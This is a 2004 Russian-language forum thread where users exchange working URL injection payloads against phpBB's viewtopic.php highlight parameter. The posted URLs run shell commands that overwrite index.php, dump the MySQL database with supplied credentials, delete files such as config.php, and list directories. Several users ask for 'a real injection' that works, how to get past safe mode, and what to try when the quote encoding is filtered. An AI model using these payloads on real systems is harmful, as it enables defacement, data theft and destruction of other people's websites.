Clone! Budet )) esli y tebya web-server stoit.... ya dlya takih celei ego i pisal.... ydobnee prosto...
21.11.2004 11:59:21
Clone! Budet )) esli y tebya web-server stoit.... ya dlya takih celei ego i pisal.... ydobnee prosto...
|
|
|
|
21.11.2004 12:49:38
Как делать SQL запросы?
Делаю так: Но что-то не очень получается %09 - это у нас пробел. %60 - одинарная кавычка. name_of_forum узнаем с помощью $dbname, т.е пишем запрос: admin_lamer узнаем с помощью $dbuser, а super_password с помощью $dbpasswd Помогите малость... [IMG] |
|
|
|
22.11.2004 01:24:31
man mysqldump
или man pg_dump если стоит постресс... лучше сделать бекап всей таблицы чем выбирать отдельный запрос... а вообще почитай по вышеуказанной ссылке |
|
|
|
22.11.2004 01:32:47
Народ какую команду то вписывать? ктонить объяснит
|
|
|
|
22.11.2004 11:59:20
Тоже юмор
|
|
|
|
22.11.2004 13:57:31
|
|
|
|
22.11.2004 15:52:12
блин все пробывал ... ниче не получаеться =( подскажите реальную иньекцию
|
|
|
|
22.11.2004 17:21:36
viewtopic.php?t=1&highlight=%2527.$poster=%60$ls%60.%2527&ls =echo%20"123"%20>%20../index.php
Замена индекс пхп на своё |
|
|
|
22.11.2004 18:38:32
Темы, которую вы запросили, не существует.
и нифига больше... |
|
|
|
22.11.2004 20:22:17
точна )
|
|
|
|
22.11.2004 21:30:08
Я одно не доганяю. Зачем к статье прилагается эксплойт на php? Ведь всё можно делать в строке браузера?!
|
|
|
|
22.11.2004 21:44:28
мля ктонить дайте работающие комманды... нифига не получается..
Warning: shell_exec(): Cannot execute using backquotes in Safe Mode in /mnt/mirror/usr/home/sites/forsak/public_html/cgi-bin/forum/ viewtopic.php(1109) : regexp code on line 1 это чего?? обойти можно ? |
|
|
|
22.11.2004 22:45:12
выводит дамп базы данных
вместо $USER, $PASS, $DBNAME подставить соответствующие значения если при t=1 не существует темы поменять на другую цифру [IMG] viewtopic.php?t=1&highlight=%2527.$poster=%60mysqldump%09mys qldump%09--user=$USER%09--password=$PASS%09$DBNAME%60.%2527 удаление файла вместо $file подставить имя файла например index.php или config.php viewtopic.php?t=1&highlight=%2527.$poster=%60rm%09$file%60.% 2527 просмотреть каталог на наличие файлов, которые можно удалить [IMG] viewtopic.php?t=1&highlight=%2527.$poster=%60ls%09-la%60.%25 27 |
|
|
|
22.11.2004 23:10:53
Usage: mysqldump [OPTIONS] database [tables] OR mysqldump [OPTIONS] --databases [OPTIONS] DB1 [DB2 DB3...] OR mysqldump [OPTIONS] --all-databases [OPTIONS] For more options, use mysqldump --help )\b#i Иначе говоря, хелп. |
|||
|
|
23.11.2004 00:04:01
там один mysqldump лишний проскачил
|
|
|
|
23.11.2004 01:33:50
Вот млин... поставил 2 недели назад 2.0.10... уже думаю на другой форум переезжать [IMG]
|
|
|
|
23.11.2004 01:56:58
А если %2527 игнорируется, есть другие варианты инъекции?
|
|
|
|
23.11.2004 05:14:00
Заметил, результат тот же. |
||||
|
|
|||